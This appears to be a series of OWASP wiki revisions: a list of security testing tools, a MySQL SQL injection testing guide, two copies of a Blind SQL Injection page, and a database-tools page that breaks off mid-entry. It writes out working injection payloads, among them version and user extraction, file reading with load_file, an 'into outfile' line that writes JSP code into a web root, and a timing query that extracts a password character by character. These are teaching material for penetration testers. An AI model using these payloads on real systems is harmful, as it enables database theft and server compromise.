** Includes an XSS Attack Library, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more.
* '''[[:Category:OWASP Pantera Web Assessment Studio Project|OWASP Pantera Web Assessment Studio Project]]'''
* SPIKE - http://www.immunitysec.com
* Paros - http://www.parosproxy.org
* Burp Proxy - http://www.portswigger.net
* Achilles Proxy - http://www.mavensecurity.com/achilles
* Odysseus Proxy - http://www.wastelands.gen.nz/odysseus/
* Webstretch Proxy - http://sourceforge.net/projects/webstretch
* Firefox LiveHTTPHeaders, Tamper Data and Developer Tools - http://www.mozdev.org
* Grendel-Scan - http://www.grendel-scan.com
* [[:Category:SWFIntruder|OWASP SWFIntruder]]
* http://www.mindedsecurity.com/swfintruder.html

[[Category:FIXME| link not working

* Sensepost Wikto (Google cached fault-finding) - http://www.sensepost.com/research/wikto/index2.html

]]

=== Testing for specific vulnerabilities ===

==== Testing AJAX ====
* '''[[:Category:OWASP Sprajax Project|OWASP Sprajax Project]]'''
==== Testing for SQL Injection ====
* '''[[:Category:OWASP_SQLiX_Project|OWASP SQLiX]]'''
* Sqlninja: a SQL Server Injection & Takeover Tool - http://sqlninja.sourceforge.net
* Bernardo Damele A. G.: sqlmap, automatic SQL injection tool - http://sqlmap.sourceforge.net
* Absinthe 1.1 (formerly SQLSqueal) - http://www.0x90.org/releases/absinthe/
* SQLInjector - http://www.databasesecurity.com/sql-injector.htm
* bsqlbf-1.2-th - http://www.514.es

[[Category:FIXME|link not working

* Multiple DBMS Sql Injection tool - SQL Power Injector
* MySql Blind Injection Bruteforcing, Reversing.org - sqlbftools
* Antonio Parata: Dump Files by sql inference on Mysql - SqlDumper

]]

==== Testing Oracle ====
* TNS Listener tool (Perl) - http://www.jammed.com/%7Ejwa/hacks/security/tnscmd/tnscmd-doc.html
* Toad for Oracle - http://www.quest.com/toad
==== Testing SSL ====
* Foundstone SSL Digger - http://www.foundstone.com/resources/proddesc/ssldigger.htm
==== Testing for Brute Force Password ====
* THC Hydra - http://www.thc.org/thc-hydra/
* John the Ripper - http://www.openwall.com/john/
* Brutus - http://www.hoobie.net/brutus/
* Medusa - http://www.foofus.net/~jmk/medusa/medusa.html

[[Category:FIXME|link not working
==== Testing for HTTP Methods ====
* NetCat - http://www.vulnwatch.org/netcat

]]
==== Testing Buffer Overflow ====
* OllyDbg - http://www.ollydbg.de
** "A windows based debugger used for analyzing buffer overflow vulnerabilities"
* Spike - http://www.immunitysec.com/downloads/SPIKE2.9.tgz
** A fuzzer framework that can be used to explore vulnerabilities and perform length testing
* Brute Force Binary Tester (BFB) - http://bfbtester.sourceforge.net
** A proactive binary checker

[[Category:FIXME|link not working

* Metasploit - http://www.metasploit.com/projects/Framework/
** A rapid exploit development and Testing frame work

]]
==== Fuzzer ====
* '''[[:Category:OWASP_WSFuzzer_Project|OWASP WSFuzzer]]'''

==== Googling ====
* Foundstone Sitedigger (Google cached fault-finding) - http://www.foundstone.com/resources/proddesc/sitedigger.htm

==Commercial Black Box Testing tools==

* Typhon - http://www.ngssoftware.com/products/internet-security/ngs-typhon.php
* NGSSQuirreL - http://www.ngssoftware.com/products/database-security/
* Watchfire AppScan - http://www.watchfire.com
* Cenzic Hailstorm - http://www.cenzic.com/products_services/cenzic_hailstorm.php
* Burp Intruder - http://portswigger.net/intruder
* Acunetix Web Vulnerability Scanner - http://www.acunetix.com
* WebSleuth - http://www.sandsprite.com
* NT Objectives NTOSpider - http://www.ntobjectives.com/products/ntospider.php
* Fortify Pen Testing Team Tool - http://www.fortifysoftware.com/products/tester
* Sandsprite Web Sleuth - http://sandsprite.com/Sleuth/
* MaxPatrol Security Scanner - http://www.maxpatrol.com
* Ecyware GreenBlue Inspector - http://www.ecyware.com
* Parasoft WebKing (more QA-type tool)
* MatriXay - http://www.dbappsecurity.com
* N-Stalker Web Application Security Scanner - http://www.nstalker.com

[[Category:FIXME|check these links

* Watchfire AppScan - http://www.watchfire.com
* Cenzic Hailstorm - http://www.cenzic.com/products_services/cenzic_hailstorm.php

link broken:
* SPI Dynamics WebInspect - http://www.spidynamics.com
* ScanDo - http://www.kavado.com

]]

==Source Code Analyzers==

===Open Source / Freeware===

* '''[[:Category:OWASP_LAPSE_Project|OWASP LAPSE]]'''
* PMD - http://pmd.sourceforge.net/
* FlawFinder - http://www.dwheeler.com/flawfinder
* Microsoft’s [[FxCop]]
* Splint - http://splint.org
* Boon - http://www.cs.berkeley.edu/~daw/boon
* FindBugs - http://findbugs.sourceforge.net

[[Category:FIXME|broken link

* Pscan - http://www.striker.ottawa.on.ca/~aland/pscan

]]

===Commercial ===

* Armorize CodeSecure - http://www.armorize.com/index.php?link_id=codesecure
* CodeWizard - http://www.parasoft.com/products/wizard
* Checkmarx CxSuite - http://www.checkmarx.com
* Fortify - http://www.fortifysoftware.com
* GrammaTech - http://www.grammatech.com
* ITS4 - http://www.cigital.com/its4
* Ounce labs Prexis - http://www.ouncelabs.com
* ParaSoft - http://www.parasoft.com
* Virtual Forge CodeProfiler for ABAP - http://www.virtualforge.de
* Veracode - http://www.veracode.com

[[Category:FIXME|link not working

* Armorize CodeSecure - http://www.armorize.com/product/

]]

==Acceptance Testing Tools==
Acceptance testing tools are used to validate the functionality of web applications. Some follow a scripted approach and typically make use of a Unit Testing framework to construct test suites and test cases. Most, if not all, can be adapted to perform security specific tests in addition to functional tests.

===Open Source Tools===

* WATIR - http://wtr.rubyforge.org
** A Ruby based web testing framework that provides an interface into Internet Explorer.
** Windows only.
* HtmlUnit - http://htmlunit.sourceforge.net
** A Java and JUnit based framework that uses the Apache HttpClient as the transport.
** Very robust and configurable and is used as the engine for a number of other testing tools.
* jWebUnit - http://jwebunit.sourceforge.net
** A Java based meta-framework that uses htmlunit or selenium as the testing engine.
* Canoo Webtest - http://webtest.canoo.com
** An XML based testing tool that provides a facade on top of htmlunit.
** No coding is necessary as the tests are completely specified in XML.
** There is the option of scripting some elements in Groovy if XML does not suffice.
** Very actively maintained.
* HttpUnit - http://httpunit.sourceforge.net
** One of the first web testing frameworks, suffers from using the native JDK provided HTTP transport, which can be a bit limiting for security testing.
* Watij - http://watij.com
** A Java implementation of WATIR.
** Windows only because it uses IE for its tests (Mozilla integration is in the works).
* Solex - http://solex.sourceforge.net
** An Eclipse plugin that provides a graphical tool to record HTTP sessions and make assertions based on the results.
* Selenium - http://www.openqa.org/selenium/
** JavaScript based testing framework, cross-platform and provides a GUI for creating tests.
** Mature and popular tool, but the use of JavaScript could hamper certain security tests.

==Other Tools==

===Runtime Analysis===

* Rational PurifyPlus - http://www-306.ibm.com/software/awdtools

===Binary Analysis===

* BugScam - http://sourceforge.net/projects/bugscam
* BugScan - http://www.hbgary.com
* Veracode - http://www.veracode.com

===Requirements Management===

* Rational Requisite Pro - http://www-306.ibm.com/software/awdtools/reqpro

===Site Mirroring===
* wget - http://www.gnu.org/software/wget, http://www.interlog.com/~tcharron/wgetwin.html
* curl - http://curl.haxx.se
* Sam Spade - http://www.samspade.org
* Xenu - http://home.snafu.de/tilman/xenulink.html

[[Category:FIXME|check this link

* Rational PurifyPlus - http://www-306.ibm.com/software/awdtools

]]

Testing for MySQL

2009-09-13T12:31:00Z

Inquis:

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v3}}

== Short Description of the Issue ==
[[SQL Injection]] vulnerabilities occur whenever input is used in the construction of a SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.

''MySQL server'' has a few particularities so that some exploits need to be
specially customized for this application. That's the subject of this section.

== Black Box testing and example ==

=== How to Test ===
When an SQL injection vulnerability is found in an application backed by a MySQL database,
there are a number of attacks that could be performed depending
on the MySQL version and user privileges on DBMS.

MySQL comes with at least four versions which are used in production worldwide.
3.23.x, 4.0.x, 4.1.x and 5.0.x.
Every version has a set of features proportional to version number.

* From Version 4.0: UNION
* From Version 4.1: Subqueries
* From Version 5.0: Stored procedures, Stored functions and the view named INFORMATION_SCHEMA
* From Version 5.0.2: Triggers

It should be noted that for MySQL versions before 4.0.x, only Boolean or time-based Blind Injection attacks could be used, since the subquery functionality or UNION statements were not implemented.

From now on, we will assume that there is a classic SQL injection vulnerability, which can be triggered by a request similar to the the one described in the Section on [[Testing for SQL Injection (OWASP-DV-005)|Testing for SQL Injection]].

<nowiki>http://www.example.com/page.php?id=2</nowiki>

=== The Single Quotes Problem ===
Before taking advantage of MySQL features,
it has to be taken in consideration how strings could be represented
in a statement, as often web applications escape single quotes.

MySQL quote escaping is the following: 
''' <nowiki>'A string with \'quotes\''</nowiki> '''

That is, MySQL interprets escaped apostrophes (\') as characters and not as
metacharacters.

So if the application, to work properly, needs to use constant strings,
two cases are to be differentiated:
# Web app escapes single quotes (' => \')
# Web app does not escape single quotes (' => ')

Under MySQL, there is a standard way to bypass the need of single quotes, having a constant string to be declared without the need for single quotes.

Let's suppose we want to know the value of a field named 'password' in a record,
with a condition like the following:
password like 'A%'

# The ASCII values in a concatenated hex: 
#: password LIKE 0x4125
# The char() function:
#: password LIKE CHAR(65,37)

=== Multiple mixed queries: ===

MySQL library connectors do not support multiple queries separated
by '''<nowiki>';'</nowiki>''' so there's no way to inject multiple non-homogeneous SQL commands inside a single SQL injection vulnerability like in Microsoft SQL Server.

For example the following injection will result in an error:

1 ; update tablename set code='javascript code' where 1 --

=== Information gathering ===

==== Fingerprinting MySQL ====

Of course, the first thing to know is if there's MySQL DBMS as a backend.

MySQL server has a feature that is used to let other DBMS ignore a clause in MySQL
dialect. When a comment block ''('/**/')'' contains an exlamation mark ''('/*! sql here*/')'' it is interpreted by MySQL, and is considered as a normal comment block by other DBMS
as explained in [http://dev.mysql.com/doc/refman/5.0/en/comments.html MySQL manual].

Example:
1 /*! and 1=0 */

'''Result Expected:''' 
''If MySQL is present, the clause inside the comment block will be interpreted.''

==== Version ====

There are three ways to gain this information:
# By using the global variable @@version
# By using the function [[http://dev.mysql.com/doc/refman/5.0/en/information-functions.html VERSION()]]
# By using comment fingerprinting with a version number /*!40110 and 1=0*/
#: which means
<nowiki>if(version >= 4.1.10)
add 'and 1=0' to the query.</nowiki>

These are equivalent as the result is the same.

In band injection:

1 AND 1=0 UNION SELECT @@version /*

Inferential injection:

1 AND @@version like '4.0%'

'''Result Expected:''' 
''A string like this: '''5.0.22-log''' ''

==== Login User ====

There are two kinds of users MySQL Server relies upon.
# [[http://dev.mysql.com/doc/refman/5.0/en/information-functions.html USER()]]: the user connected to the MySQL Server.
# [[http://dev.mysql.com/doc/refman/5.0/en/information-functions.html CURRENT_USER()]]: the internal user who is executing the query.

There is some difference between 1 and 2.

The main one is that an anonymous user could connect (if allowed)
with any name, but the MySQL internal user is an empty name (<nowiki>''</nowiki>).

Another difference is that a stored procedure or a stored function
are executed as the creator user, if not declared elsewhere. This
can be known by using '''CURRENT_USER'''.

In band injection:

1 AND 1=0 UNION SELECT USER()

Inferential injection:

1 AND USER() like 'root%'

'''Result Expected:''' 
''A string like this: '''user@hostname''' ''

==== Database name in use ====

There is the native function DATABASE()

In band injection:

1 AND 1=0 UNION SELECT DATABASE()

Inferential injection:

1 AND DATABASE() like 'db%'

'''Result Expected:''' 
''A string like this: '''dbname''' ''

==== INFORMATION_SCHEMA ====
From MySQL 5.0 a view named [[http://dev.mysql.com/doc/refman/5.0/en/information-schema.html INFORMATION_SCHEMA]] was created.
It allows us to get all informations about databases, tables, and columns,
as well as procedures and functions.

Here is a summary of some interesting Views.
{| border=1
|| '''Tables_in_INFORMATION_SCHEMA''' || '''DESCRIPTION'''
|-
|| ..[skipped]..|| ..[skipped]..
|-
|| SCHEMATA || All databases the user has (at least) SELECT_priv
|-
|| SCHEMA_PRIVILEGES || The privileges the user has for each DB
|-
|| TABLES || All tables the user has (at least) SELECT_priv
|-
|| TABLE_PRIVILEGES || The privileges the user has for each table
|-
|| COLUMNS || All columns the user has (at least) SELECT_priv
|-
|| COLUMN_PRIVILEGES || The privileges the user has for each column
|-
|| VIEWS || All columns the user has (at least) SELECT_priv
|-
|| ROUTINES || Procedures and functions (needs EXECUTE_priv)
|-
|| TRIGGERS || Triggers (needs INSERT_priv)
|-
|| USER_PRIVILEGES || Privileges connected User has
|-
|}
All of this information could be extracted by using known techniques as
described in SQL Injection section.

=== Attack vectors ===

==== Write in a File ====

If the connected user has '''FILE''' privileges and single quotes are not escaped,
the 'into outfile' clause can be used to export query results in a file.

Select * from table into outfile '/tmp/file'

Note: there is no way to bypass single quotes surrounding a filename.
So if there's some sanitization on single quotes like escape (\') there will
be no way to use the 'into outfile' clause.

This kind of attack could be used as an out-of-band technique to gain information
about the results of a query or to write a file which could be executed inside the
web server directory.

Example:

<nowiki>1 limit 1 into outfile '/var/www/root/test.jsp' FIELDS ENCLOSED BY '//' LINES TERMINATED BY '\n<%jsp code here%>';</nowiki>

'''Result Expected:''' 
'' Results are stored in a file with rw-rw-rw privileges owned by
MySQL user and group.

Where ''/var/www/root/test.jsp'' will contain:
<nowiki>//field values//
<%jsp code here%></nowiki>

==== Read from a File ====

Load_file is a native function that can read a file when allowed by
filesystem permissions.

If a connected user has '''FILE''' privileges, it could be used to get the files' content.

Single quotes escape sanitization can by bypassed by using previously described
techniques.

load_file('filename')

'''Result Expected:''' 

''The whole file will be available for exporting by using standard techniques.''

=== Standard SQL Injection Attack ===

In a standard SQL injection you can have results displayed directly
in a page as normal output or as a MySQL error.
By using already mentioned SQL Injection attacks and the already described
MySQL features, direct SQL injection could be easily accomplished at a level
depth depending primarily on the MySQL version the pentester is facing.

A good attack is to know the results by forcing a function/procedure
or the server itself to throw an error.
A list of errors thrown by MySQL and in particular native functions could
be found on [http://dev.mysql.com/doc/refman/5.0/en/error-messages-server.html MySQL Manual].

=== Out of band SQL Injection ===

Out of band injection could be accomplished by using the [[#Write_in_a_File|'into outfile']] clause.
=== Blind SQL Injection ===
For blind SQL injection, there is a set of useful function natively provided by MySQL server.

* String Length:
*: ''LENGTH(str)''
* Extract a substring from a given string:
*: ''SUBSTRING(string, offset, #chars_returned)''
* Time based Blind Injection: BENCHMARK and SLEEP
*: ''BENCHMARK(#ofcicles,action_to_be_performed )''
*: The benchmark function could be used to perform timing attacks, when blind injection by boolean values does not yield any results.
*: See. SLEEP() (MySQL > 5.0.x) for an alternative on benchmark.

For a complete list, refer to MySQL manual - http://dev.mysql.com/doc/refman/5.0/en/functions.html

== References ==
'''Whitepapers''' 
* Chris Anley: "Hackproofing MySQL" -http://www.nextgenss.com/papers/HackproofingMySQL.pdf

'''Tools''' 
* Francois Larouche: Multiple DBMS SQL Injection tool - http://www.sqlpowerinjector.com/index.htm 
* ilo--: MySQL Blind Injection Bruteforcing, Reversing.org - http://www.reversing.org/node/view/11 sqlbftools 
* Bernardo Damele A. G.: sqlmap, automatic SQL injection tool - http://sqlmap.sourceforge.net
* Antonio Parata: Dump Files by SQL inference on MySQL - http://www.ictsc.it/site/IT/projects/sqlDumper/sqldumper.src.tar.gz 

[[Category:FIXME|link not working

'''Case Studies''' 
* Time Based SQL Injection Explained - http://www.f-g.it/papers/blind-zk.txt

]]

Blind SQL Injection

2009-09-13T12:30:13Z

Inquis:

{{Template:Attack}}
[[Category:OWASP ASDR Project]]
[[Category:Security Focus Area]]
__NOTOC__
 

Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Overview==
When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal [[SQL Injection]] except that when an attacker attempts to exploit an application, rather then getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

==Threat Modeling==
Same as for [[SQL Injection]]

==Related Security Activities==

===How to Avoid SQL Injection Vulnerabilities===

See the [[:Category:OWASP Guide Project|OWASP Development Guide]] article on how to [[Guide to SQL Injection | Avoid SQL Injection]] Vulnerabilities.
 See the OWASP [[SQL Injection Prevention Cheat Sheet]].

===How to Avoid SQL Injection Vulnerabilities===

See the [[:Category:OWASP Code Review Project|OWASP Code Review Guide]] article on how to [[Reviewing Code for SQL Injection|Review Code for SQL Injection]] Vulnerabilities.

===How to Test for SQL Injection Vulnerabilities===

See the [[:Category:OWASP Testing Project|OWASP Testing Guide]] article on how to [[Testing for SQL Injection (OWASP-DV-005)|Test for SQL Injection]] Vulnerabilities.

==Description==
TBD

==Risk Factors==
Same as for [[SQL Injection]]

==Examples ==
An attacker may verify whether a sent request returned True or False in a few ways:

===(in)visible content===
Having a simple page, which displays article with given ID as the parameter, the attacker may perform a couple of simple tests if a page is vulnerable to SQL Injection attack.

Example URL:
<pre>
http://newspaper.com/items.php?id=2
</pre>
sends the following query to the database:
<pre>
SELECT title, description, body FROM items WHERE ID = 2
</prE>
The attacker may try to inject any (even invalid) query, what should cause the query to return no results:
<pre>
http://newspaper.com/items.php?id=2 and 1=2
</pre>
Now the SQL query should looks like this:
<pre>
SELECT title, description, body FROM items WHERE ID = 2 and 1=2
</pre>
Which means that the query is not going to return anything.

If the web application is vulnerable to SQL Injection, then it probably will not return anything. To make sure, the attacker will certainly inject a valid query:
<pre>
http://newspaper.com/items.php?id=2 and 1=1
</pre>
If the content of the page is the same, then the attacker is able to distinguish when the query is True or False.

What next? The only limitations are privileges set up by the database administrator, different SQL dialects and finally the attacker's imagination.

===RDBMS fingerprinting===

If the attacker is able to determine when his query returns True or False, then he may fingerprint the RDBMS. This will make the whole attack much easier to him. One of the most popular methods to do this is to call functions which will return the current date. MySQL, MS SQL or Oracle have different functions for that, respectively ''now()'', ''getdate()'', and ''sysdate()''.

===Timing Attack===

A Timing Attack depends upon injecting the following MySQL query:
<pre>
SELECT IF(expression, true, false)
</pre>
Using some time-taking operation e.g. BENCHMARK(), will delay server
responses if the expression is True.

<pre>BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))</pre> - will execute 5000000 times the ENCODE function.

Depending on the database server performence and its load, it should
take just a moment to finish this operation. The important thing is,
from the attacker's point of view, to specify high number of BENCHMARK()
function repetitons, which should affect the server
response time in a noticeable way.

Example combination of both queries:
<pre>
1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;
</pre>
If the server response was quite long we may expect that the first user password character with user_id = 1 is character '2'.
<pre>
(CHAR(50) == '2')
</pre>
Using this method for the rest of characters, it's possible to get to know entire password stored in the database. This method works even when the attacker injects the SQL queries and the content of the vulnerable page doesn't change.

Obviously, in this example the names of the tables and the number of columns was specified. However, it's possible to guess them or check with a trial and error method.

Other databases than MySQL also have implemented functions which allow them to use timing attacks:
* MS SQL 'WAIT FOR DELAY '0:0:10''
* PostgreSQL - pg_sleep()

Conducting Blind_SQL_Injection attacks manually is very time consuming, but there are a lot of tools which automate this process. One of them is SQLMap (http://sqlmap.sourceforge.net/) partly developed within OWASP grant program. On the other hand, tools of this kind are very sensitive to even small deviations from the rule. This includes:
* scanning othe WWW cluster, where clocks are not ideally synchronized,
* WWW services where argument acquiring method was changed, e.g. from /index.php?ID=10 to /ID,10

==Related [[Threat Agents]]==
Same as for [[SQL Injection]]

==Related [[Attacks]]==
* [[Blind_XPath_Injection]]
* [[SQL_Injection]]
* [[XPATH_Injection]]
* [[LDAP_injection]]
* [[Server-Side_Includes_%28SSI%29_Injection]]

==Related [[Vulnerabilities]]==
* [[Injection_problem]]

==Related [[Controls]]==
* [[:Category:Input Validation]]

==References==
* http://www.cgisecurity.com/questions/blindsql.shtml
* http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
* http://www.securitydocs.com/library/2651
* http://seclists.org/bugtraq/2005/Feb/0288.html
* http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/

'''Online Resources'''
* [http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf more Advanced SQL Injection] - by NGS
* [http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf Blind SQL Injection Automation Techniques] - Black Hat Pdf
* [http://seclists.org/lists/bugtraq/2005/Feb/0288.html Blind Sql-Injection in MySQL Databases]
* [http://www.cgisecurity.com/questions/blindsql.shtml Cgisecurity.com: What is Blind SQL Injection?]
* [http://www.securitydocs.com/library/2651 Blind SQL Injection]
* http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
* http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
* [http://wcsc.myweb.usf.edu/tutorials/SQL_Injection.ppt SQL Injection Attacks]

[[Category:FIXME|check link:

* http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf

]]

'''Tools'''
* [http://www.sqlpowerinjector.com/ SQL Power Injector]
* [http://www.0x90.org/releases/absinthe/ Absinthe :: Automated Blind SQL Injection] // ver1.3.1
* [http://www.securiteam.com/tools/5IP0L20I0E.html SQLBrute - Multi Threaded Blind SQL Injection Bruteforcer] in Python
* [[:Category:OWASP_SQLiX_Project|SQLiX - SQL Injection Scanner]] in Perl
* [http://sqlmap.sourceforge.net sqlmap, automatic SQL injection tool] in Python
* [http://www.514.es/2006/12/inyeccion_de_codigo_bsqlbf12th.html bsqlbf, a blind SQL injection tool] in Perl

[[Category:Injection]]
[[Category: Attack]]

Blind SQL Injection

2009-09-13T12:29:41Z

Inquis:

{{Template:Attack}}
[[Category:OWASP ASDR Project]]
[[Category:Security Focus Area]]
__NOTOC__
 

Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Overview==
When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal [[SQL Injection]] except that when an attacker attempts to exploit an application, rather then getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

==Threat Modeling==
Same as for [[SQL Injection]]

==Related Security Activities==

===How to Avoid SQL Injection Vulnerabilities===

See the [[:Category:OWASP Guide Project|OWASP Development Guide]] article on how to [[Guide to SQL Injection | Avoid SQL Injection]] Vulnerabilities.
 See the OWASP [[SQL Injection Prevention Cheat Sheet]].

===How to Avoid SQL Injection Vulnerabilities===

See the [[:Category:OWASP Code Review Project|OWASP Code Review Guide]] article on how to [[Reviewing Code for SQL Injection|Review Code for SQL Injection]] Vulnerabilities.

===How to Test for SQL Injection Vulnerabilities===

See the [[:Category:OWASP Testing Project|OWASP Testing Guide]] article on how to [[Testing for SQL Injection (OWASP-DV-005)|Test for SQL Injection]] Vulnerabilities.

==Description==
TBD

==Risk Factors==
Same as for [[SQL Injection]]

==Examples ==
An attacker may verify whether a sent request returned True or False in a few ways:

===(in)visible content===
Having a simple page, which displays article with given ID as the parameter, the attacker may perform a couple of simple tests if a page is vulnerable to SQL Injection attack.

Example URL:
<pre>
http://newspaper.com/items.php?id=2
</pre>
sends the following query to the database:
<pre>
SELECT title, description, body FROM items WHERE ID = 2
</prE>
The attacker may try to inject any (even invalid) query, what should cause the query to return no results:
<pre>
http://newspaper.com/items.php?id=2 and 1=2
</pre>
Now the SQL query should looks like this:
<pre>
SELECT title, description, body FROM items WHERE ID = 2 and 1=2
</pre>
Which means that the query is not going to return anything.

If the web application is vulnerable to SQL Injection, then it probably will not return anything. To make sure, the attacker will certainly inject a valid query:
<pre>
http://newspaper.com/items.php?id=2 and 1=1
</pre>
If the content of the page is the same, then the attacker is able to distinguish when the query is True or False.

What next? The only limitations are privileges set up by the database administrator, different SQL dialects and finally the attacker's imagination.

===RDBMS fingerprinting===

If the attacker is able to determine when his query returns True or False, then he may fingerprint the RDBMS. This will make the whole attack much easier to him. One of the most popular methods to do this is to call functions which will return the current date. MySQL, MS SQL or Oracle have different functions for that, respectively ''now()'', ''getdate()'', and ''sysdate()''.

===Timing Attack===

A Timing Attack depends upon injecting the following MySQL query:
<pre>
SELECT IF(expression, true, false)
</pre>
Using some time-taking operation e.g. BENCHMARK(), will delay server
responses if the expression is True.

<pre>BENCHMARK(5000000,ENCODE('MSG','by 5 seconds'))</pre> - will execute 5000000 times the ENCODE function.

Depending on the database server performence and its load, it should
take just a moment to finish this operation. The important thing is,
from the attacker's point of view, to specify high number of BENCHMARK()
function repetitons, which should affect the server
response time in a noticeable way.

Example combination of both queries:
<pre>
1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;
</pre>
If the server response was quite long we may expect that the first user password character with user_id = 1 is character '2'.
<pre>
(CHAR(50) == '2')
</pre>
Using this method for the rest of characters, it's possible to get to know entire password stored in the database. This method works even when the attacker injects the SQL queries and the content of the vulnerable page doesn't change.

Obviously, in this example the names of the tables and the number of columns was specified. However, it's possible to guess them or check with a trial and error method.

Other databases than MySQL also have implemented functions which allow them to use timing attacks:
* MS SQL 'WAIT FOR DELAY '0:0:10''
* PostgreSQL - pg_sleep()

Conducting Blind_SQL_Injection attacks manually is very time consuming, but there are a lot of tools which automate this process. One of them is SQLMap (http://sqlmap.sourceforge.net/) partly developed within OWASP grant program. On the other hand, tools of this kind are very sensitive to even small deviations from the rule. This includes:
* scanning othe WWW cluster, where clocks are not ideally synchronized,
* WWW services where argument acquiring method was changed, e.g. from /index.php?ID=10 to /ID,10

==Related [[Threat Agents]]==
Same as for [[SQL Injection]]

==Related [[Attacks]]==
* [[Blind_XPath_Injection]]
* [[SQL_Injection]]
* [[XPATH_Injection]]
* [[LDAP_injection]]
* [[Server-Side_Includes_%28SSI%29_Injection]]

==Related [[Vulnerabilities]]==
* [[Injection_problem]]

==Related [[Controls]]==
* [[:Category:Input Validation]]

==References==
* http://www.cgisecurity.com/questions/blindsql.shtml
* http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
* http://www.securitydocs.com/library/2651
* http://seclists.org/bugtraq/2005/Feb/0288.html
* http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/

'''Online Resources'''
* [http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf more Advanced SQL Injection] - by NGS
* [http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf Blind SQL Injection Automation Techniques] - Black Hat Pdf
* [http://seclists.org/lists/bugtraq/2005/Feb/0288.html Blind Sql-Injection in MySQL Databases]
* [http://www.cgisecurity.com/questions/blindsql.shtml Cgisecurity.com: What is Blind SQL Injection?]
* [http://www.securitydocs.com/library/2651 Blind SQL Injection]
* http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
* http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
* [http://wcsc.myweb.usf.edu/tutorials/SQL_Injection.ppt SQL Injection Attacks]

[[Category:FIXME|check link:

* http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf

]]

'''Tools'''
* [http://www.sqlpowerinjector.com/ SQL Power Injector]
* [http://www.0x90.org/releases/absinthe/ Absinthe :: Automated Blind SQL Injection] // ver1.3.1
* [http://www.securiteam.com/tools/5IP0L20I0E.html SQLBrute - Multi Threaded Blind SQL Injection Bruteforcer] in Python
* [[:Category:OWASP_SQLiX_Project|SQLiX - SQL Injection Scanner]] in Perl
* [http://sqlmap.sourceforge.net sqlmap, a blind SQL injection tool] in Python
* [http://www.514.es/2006/12/inyeccion_de_codigo_bsqlbf12th.html bsqlbf, a blind SQL injection tool] in Perl

[[Category:Injection]]
[[Category: Attack]]

OWASP Backend Security Project Tools

2009-09-13T12:28:56Z

Inquis:

[[Category:OWASP Backend Security Project]]

= Tools =

The aim of this section is to enumerate and quickly describe the tools used to find and exploit some vulnerabilities concerning database management systems.

== SQL Ninja ==

SQL Ninja is a tool, written in Perl, which helps a penetration tester to gain a shell on a system running Microsoft SQL server, exploiting a web application resulted vulnerable to SQL Injection.

http://sqlninja.sourceforge.net

== SQLMap ==

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

http://sqlmap.sourceforge.net

== OWASP SQLiX ==

SQLiX is a tool, written in Perl, able to identify the back-end database, find blind and normal injection and also execute system commands on a Microsoft SQL Server. It was also successfully tested on MySQL and PostgreSQL.

http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project

== Scuba ==

Scuba is a Database vulnerability scanner able to find vulnerabilities like unpatched software, unsafe processes and weak password on Oracle, DB2, Microsoft SQL Server and Sybase.

http://www.imperva.com/products/scuba.html

== SQID SQL Injection Digger ==

SQL injection digger is a command line program, written in [http://www.ruby-lang.org/ ruby], that looks for SQL injections and common errors in websites. It can perform the following operations:
* Look for SQL injection in a webpage, by looking for links
* Submit forms in a webpage to look for SQL injection
* Crawl a website to perform the above listed operations
* Perform a google search for a query and look for SQL injections in the urls found

http://sqid.rubyforge.org

== SqlDumper ==

Exploiting a SQL injection vulnerability SqlDumper can make dump of any file in the file system. It work only with DBMS MySql.

http://www.ictsc.it/site/IT/projects/sqlDumper/sqlDumper.php

== SQL Power Injector ==

